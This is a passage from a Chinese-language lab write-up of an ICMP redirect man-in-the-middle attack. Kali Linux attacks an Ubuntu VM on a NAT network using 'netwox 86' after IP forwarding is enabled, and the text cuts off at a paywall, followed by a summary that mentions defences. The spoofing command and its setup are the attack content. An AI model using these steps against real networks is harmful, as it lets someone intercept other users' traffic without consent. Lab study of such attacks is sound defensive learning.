ICMP重定向攻击实验:
0x01 攻击目的:
使用攻击机对本网段内靶机进行ICMP重定向攻击。目的是诱使靶机认为攻击机是网关,将所有流量交给攻击机转发。攻击机即可实现中间人身份。
0x02 环境介绍:
攻击机:Kali linux
靶机:ubuntu 20.04
存在形式:vmware之虚机
联网方式:NAT
IP地址:
Gateway:192.168.8.2/24
Kali linux:192.168.8.128/24
Ubuntu20.04:192.168.8.130/24
0x03 攻击机和靶机的系统状态:
攻击机开启IPv4转发功能:
root@kali:/proc/sys/net/ipv4# echo “1” > ip_forward
root@kali:/proc/sys/net/ipv4# cat ip_forward
1
靶机开启ICMP重定向报文接受:(默认机制就是接受)
francis@francis:~$ cat /proc/sys/net/ipv4/conf/all/accept_redirects
1
0x04 攻击过程
攻击机执行如下命令:
netwox 86 -d “eth0” -g “192.168.8.128” -i “192.168.8.2”
注:netwox是一个常用报文伪装工具,其中86代表ICMP重定向报文伪装。以上命令具体语法解释如下:
-d “攻击出接

本文详述了ICMP重定向攻击实验,通过Kali Linux攻击机对Ubuntu靶机进行中间人攻击,利用netwox工具发送ICMP重定向报文,改变靶机的流量转发路径。同时介绍了防御措施,包括禁用网关发送ICMP重定向报文和靶机拒绝接受ICMP重定向报文。
最低0.47元/天 解锁文章
6054

被折叠的 条评论
为什么被折叠?



